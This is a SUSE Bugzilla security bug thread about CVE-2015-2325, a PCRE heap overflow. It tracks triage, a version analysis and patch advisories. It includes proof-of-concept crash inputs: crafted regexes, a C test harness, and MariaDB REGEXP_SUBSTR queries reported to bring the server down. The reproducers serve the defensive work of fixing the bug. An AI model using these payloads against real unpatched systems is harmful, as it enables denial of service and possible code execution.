Bugzilla – Bug 924960
VUL-0: CVE-2015-2325: pcre: heap buffer overflow in compile_branch()
Last modified: 2020-03-27 17:07:26 UTC
rh#1207198 A flaw was found in the PCRE library: PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. Upstream issue: http://bugs.exim.org/show_bug.cgi?id=1591 Upstream patch: http://vcs.pcre.org/viewvc?revision=1528&view=revision References: https://bugzilla.redhat.com/show_bug.cgi?id=1207198
bugbot adjusting priority
Reproducer from http://bugs.exim.org/show_bug.cgi?id=1591 "((?2){0,1999}?(b(?2)c)){0,2}" The simplest PoC is "((?2){0,1999}())?" To reproduce the issue, you could use the following C code: #define PCRE_STATIC #include "pcre.h" #include <stdio.h> #include <string.h> #define OVECCOUNT 30 int main(int argc, char* argv[]) { pcre *re; const char *error; int erroffset; int ovector[OVECCOUNT]; int rc; if (argc != 3){ printf("Two arguments required: a regex and a subject string.\n"); return -1; } re = pcre_compile(argv[1], 0, &error, &erroffset, NULL); if (re == NULL){ printf("PCRE compilation failed at offset %d: %s.\n",erroffset,error); } rc = pcre_exec(re, NULL, argv[2], (int)strlen(argv[2]), 0, 0, ovector, OVECCOUNT); if (rc < 0){ switch (rc){ case PCRE_ERROR_NOMATCH:printf("No match.\n"); break; default: printf("Matching error %d.\n", rc); break; } return -1; } return 0; } Compile it as main.exe, then run it as follows. main.exe "((?2){0,1999}())?" AAAAAAAAA
An update workflow for this issue was started. This issue was rated as important. Please submit fixed packages until 2015-04-14. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/61428
Stephan, any news here? The due date for submission was 2015-04-14. Thanks in advance.
No news here. 04-14 was during hackweek and this week I'm busy with other things
So: the code in question changed heavily between 8.32 8.33 and 8.36 and RH closed their bug as WONTFIX. If you insist, I can surely spend a week trying to understand how pcre works, but as I'm seing this code for the first time, the chances I will break things are much higher than me fixing things ;(
The reproducer from #2 says: PCRE compilation failed at offset 17: internal error: previously-checked referenced subpattern not found. Matching error -2. I assume this is INVALID for us too - 8.33 just doesn't have the code that is supposed to be affected
according to my analysis (and kind of RH's) this does not affect SLE-12 but is a side effect of refactoring happened between 8.33 and 8.36
Thanks for the thorough analysis. Moving to openSUSE, assigning to bugowner in Base:System/pcre.
Right, noted. Taking back to security team, adding recent version updaters, including community.
https://build.opensuse.org/request/show/304864 https://build.opensuse.org/request/show/304866
openSUSE-SU-2015:0858-1: An update that fixes three vulnerabilities is now available. Category: security (moderate) Bug References: 906574,924960,924961 CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2326 Sources used: openSUSE 13.2 (src): pcre-8.37-3.5.1 openSUSE 13.1 (src): pcre-8.37-2.4.1
For MariaDB https://mariadb.com/kb/en/mariadb/security/ CVE-2015-2325: MariaDB 10.0.18 Fixes for the following security vulnerabilities: CVE-2014-8964 / CVE-2015-2325 / CVE-2015-2326 bundled PCRE contained heap-based buffer overflow vulnerability that allowed the server to crash or have other unspecified impact via a crafted regular expression made possible with the REGEXP_SUBSTR function (MDEV-8006). https://mariadb.atlassian.net/browse/MDEV-8006 Proof of Concept/How to Reproduce: To reproduce the first issue, you can use mysql to access remote MariaDB server (for example, "mysql -uroot -p") and do the following database operation: SELECT REGEXP_SUBSTR('ABC','(?i)((?2){0,1999}?(())|A)*'); To reproduce the second issue, do the following database operation: SELECT REGEXP_SUBSTR('ABC','((?+1)()){222,}+'); It causes the MariaDB Server down. And some screenshots are attached. Note: The repro of these two issues may be unstable, sometimes you need to try it many times.
SUSE-SU-2015:1273-1: An update that solves 12 vulnerabilities and has one errata is now available. Category: security (important) Bug References: 906574,919053,919062,920865,920896,921333,924663,924960,924961,934789,936407,936408,936409 CVE References: CVE-2014-8964,CVE-2015-0433,CVE-2015-0441,CVE-2015-0499,CVE-2015-0501,CVE-2015-0505,CVE-2015-2325,CVE-2015-2326,CVE-2015-2568,CVE-2015-2571,CVE-2015-2573,CVE-2015-3152 Sources used: SUSE Linux Enterprise Workstation Extension 12 (src): mariadb-10.0.20-18.1 SUSE Linux Enterprise Software Development Kit 12 (src): mariadb-10.0.20-18.1 SUSE Linux Enterprise Server 12 (src): mariadb-10.0.20-18.1 SUSE Linux Enterprise Desktop 12 (src): mariadb-10.0.20-18.1
SUSE-SU-2016:2971-1: An update that fixes 25 vulnerabilities is now available. Category: security (moderate) Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127 CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191 Sources used: SUSE Linux Enterprise Workstation Extension 12-SP2 (src): pcre-8.39-5.1 SUSE Linux Enterprise Workstation Extension 12-SP1 (src): pcre-8.39-5.1 SUSE Linux Enterprise Software Development Kit 12-SP2 (src): pcre-8.39-5.1 SUSE Linux Enterprise Software Development Kit 12-SP1 (src): pcre-8.39-5.1 SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src): pcre-8.39-5.1 SUSE Linux Enterprise Server 12-SP2 (src): pcre-8.39-5.1 SUSE Linux Enterprise Server 12-SP1 (src): pcre-8.39-5.1 SUSE Linux Enterprise High Availability 12-SP2 (src): pcre-8.39-5.1 SUSE Linux Enterprise High Availability 12-SP1 (src): pcre-8.39-5.1 SUSE Linux Enterprise Desktop 12-SP2 (src): pcre-8.39-5.1 SUSE Linux Enterprise Desktop 12-SP1 (src): pcre-8.39-5.1
openSUSE-SU-2016:3099-1: An update that fixes 25 vulnerabilities is now available. Category: security (moderate) Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127 CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191 Sources used: openSUSE Leap 42.2 (src): pcre-8.39-6.1 openSUSE Leap 42.1 (src): pcre-8.39-5.1
SUSE-SU-2016:3161-1: An update that fixes 25 vulnerabilities is now available. Category: security (moderate) Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127 CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191 Sources used: SUSE Linux Enterprise Workstation Extension 12-SP2 (src): pcre-8.39-7.1 SUSE Linux Enterprise Workstation Extension 12-SP1 (src): pcre-8.39-7.1 SUSE Linux Enterprise Software Development Kit 12-SP2 (src): pcre-8.39-7.1 SUSE Linux Enterprise Software Development Kit 12-SP1 (src): pcre-8.39-7.1 SUSE Linux Enterprise Server for SAP 12 (src): pcre-8.39-7.1 SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src): pcre-8.39-7.1 SUSE Linux Enterprise Server 12-SP2 (src): pcre-8.39-7.1 SUSE Linux Enterprise Server 12-SP1 (src): pcre-8.39-7.1 SUSE Linux Enterprise Server 12-LTSS (src): pcre-8.39-7.1 SUSE Linux Enterprise High Availability 12-SP2 (src): pcre-8.39-7.1 SUSE Linux Enterprise High Availability 12-SP1 (src): pcre-8.39-7.1 SUSE Linux Enterprise Desktop 12-SP2 (src): pcre-8.39-7.1 SUSE Linux Enterprise Desktop 12-SP1 (src): pcre-8.39-7.1
done
This is an autogenerated message for OBS integration: This bug (924960) was mentioned in https://build.opensuse.org/request/show/653587 Backports:SLE-12 / pcre2